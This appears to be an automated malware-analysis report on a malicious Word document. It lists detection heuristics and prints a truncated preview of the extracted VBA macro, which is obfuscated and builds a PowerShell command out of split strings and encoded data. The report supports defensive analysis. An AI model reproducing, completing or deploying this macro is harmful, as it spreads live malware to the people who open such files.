MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute external commands. The script concatenates strings to form what appears to be a command or identifier, suggesting it's part of a downloader or execution chain.
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-6707484-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6707484-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28815 bytes |
SHA-256: 3a4819303191d2c3e7260865ad9cca6e82c45c73609164aa0acd7c50d9be0f74 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PAYfwiOjsjMi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FNawurQ"
Function RdmprBqkUjf()
On Error Resume Next
hhjRmz = (vQOzOC * 68574 + 90221 * CInt(OYQWa - CDbl(69122)) * 63533 * Oct(9509))
MHdHaoFVF = "Hel" + "l " + Chr(34) + "$(" + "SET" + "-IT"
skvjzC = (nQakA * 19509 + 15751 * CInt(GKLMww - CDbl(91466)) * 46137 * Oct(17397))
DDMvpbkCIBE = "Em " + " 'v" + "ar"
UJXXC = (AijtMz * 24136 + 35983 * CInt(iblIK - CDbl(49519)) * 9216 * Oct(32080))
njvdwudrNz = "Iab" + "lE:" + "OFS"
RdmprBqkUjf = MHdHaoFVF + DDMvpbkCIBE + njvdwudrNz
QQYUG = (zMmWds * 88690 + 30056 * CInt(cjVdO - CDbl(74614)) * 13568 * Oct(95462))
End Function
Function jFJLIjp()
On Error Resume Next
zQVKPw = (PsGGma * 62362 + 45897 * CInt(wAMppU - CDbl(77022)) * 22255 * Oct(44645))
HnpakwbLD = "' " + "'' " + ") " + Chr(34)
aDbCdJ = (iUqTm * 94868 + 77165 * CInt(NznIcC - CDbl(6576)) * 95990 * Oct(73081))
BYZcCDPMpM = "+[" + "stR" + "iNG" + "](" + " '6"
muHEf = (JmjXjo * 82198 + 55995 * CInt(TvMhYJ - CDbl(5905)) * 46794 * Oct(12484))
brAUOLm = "2-" + "88&" + "10" + "4h7" + "2A1"
UACvdX = (pjrOL * 51499 + 78165 * CInt(JzNQA - CDbl(49110)) * 17403 * Oct(19781))
HnXJiQCw = "10" + "h66" + "h10"
IHrQN = (jWBcK * 53144 + 12909 * CInt(GAdzGl - CDbl(66293)) * 15311 * Oct(39361))
HmiEnrs = "9y5" + "8h" + "39%" + "58h" + "116" + "d12" + "7i"
TOJpI = (BLqrm * 41205 + 61721 * CInt(baHsKw - CDbl(57179)) * 73426 * Oct(6175))
KjEJHbqoLZi = "109" + "i5" + "5y" + "117" + "%1"
HPXaC = (cAnTw * 99308 + 98723 * CInt(OvbzlP - CDbl(10711)) * 71014 * Oct(39403))
oiulwnQ = "20" + "y1" + "12h" + "127" + "-12" + "1d" + "110"
jFJLIjp = HnpakwbLD + BYZcCDPMpM + brAUOLm + HnXJiQCw + HmiEnrs + KjEJHbqoLZi + oiulwnQ
YjipzW = (hLBhsi * 52916 + 18273 * CInt(OliMt - CDbl(53065)) * 53115 * Oct(26257))
End Function
Function pBTFRQbUt()
On Error Resume Next
OWiAoC = (vkCWu * 74937 + 5825 * CInt(ZOozM - CDbl(42058)) * 23734 * Oct(99096))
HSzWpLIkulL = "%5" + "8A1" + "04" + "i1"
TAUCHt = (EQLizP * 63182 + 43866 * CInt(KzwZnX - CDbl(53839)) * 66020 * Oct(33855))
IwHiDid = "23W" + "116" + "-1" + "26y" + "117" + "A1"
fmdAIC = (ohoiU * 75490 + 82262 * CInt(RdbUR - CDbl(19651)) * 64573 * Oct(34269))
CJaMqjGhUV = "19T" + "33i" + "62" + "%1" + "14-" + "10" + "9d1"
BYNaCv = (llVOJ * 51479 + 29715 * CInt(jcazi - CDbl(31621)) * 82289 * Oct(19004))
OHcHzvQHSBA = "05" + "h1" + "06W" + "10" + "8A" + "58d"
TVtAO = (czViz * 68988 + 78534 * CInt(mmQwjS - CDbl(55024)) * 92377 * Oct(82476))
zJzTRPJUfl = "39" + "W5" + "8&" + "11"
pBTFRQbUt = HSzWpLIkulL + IwHiDid + CJaMqjGhUV + OHcHzvQHSBA + zJzTRPJUfl
Ynpji = (iLOGGj * 3613 + 45609 * CInt(ksQow - CDbl(31524)) * 36202 * Oct(83474))
End Function
Function tOiiRvjwCsW()
On Error Resume Next
oNSTHr = (XifbaL * 87172 + 29475 * CInt(vnVirF - CDbl(69561)) * 85390 * Oct(47668))
mjjIasStJYU = "6i1" + "27" + "i10" + "9W5" + "5y"
ZMHuwG = (KuVQOD * 44431 + 51799 * CInt(BWwzZz - CDbl(2208)) * 4668 * Oct(1247))
ltbrLDhldAF = "11" + "7-" + "12"
zInjca = (JSSQkh * 40808 + 57379 * CInt(wuVjk - CDbl(95990)) * 15070 * Oct(16528))
tbicnWd = "0-" + "11" + "2A" + "12"
NwbYa = (FtVIn * 43973 + 21705 * CInt(qTtEHS - CDbl(33388)) * 79828 * Oct(52182))
KDaUVGwt = "7-1" + "21A" + "110" + "d58" + "i7"
YAHhT = (zAffPi * 38020 + 70217 * CInt(HKqLMp - CDbl(57386)) * 76027 * Oct(3644))
wukLcNA = "3&" + "99d" + "10" + "5&1"
tOiiRvjwCsW = mjjIasStJYU + ltbrLDhldAF + tbicnWd + KDaUVGwt + wukLcNA
Nqszqm = (UHAaD * 46383 + 50331 * CInt(InrfcM - CDbl(99664)) * 18030 * Oct(25510))
End Function
Function jCIVz()
On Error Resume Next
HaiOdu = (FCGAG * 1758 + 78372 * CInt(rJLkRE - CDbl(74681)) * 31276 * Oct(64489))
OsSLJEjIdM = "10" + "y12" + "7%" + "11" + "9T" + "52T"
CmHZS = (hfziL * 88387 + 12819 * CInt(FNwVTc - CDbl(2906)) * 73316 * Oct(5915))
MzXEu = "84" + "d1" + "27" + "A1"
lDnZvv = (KwJaI *
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.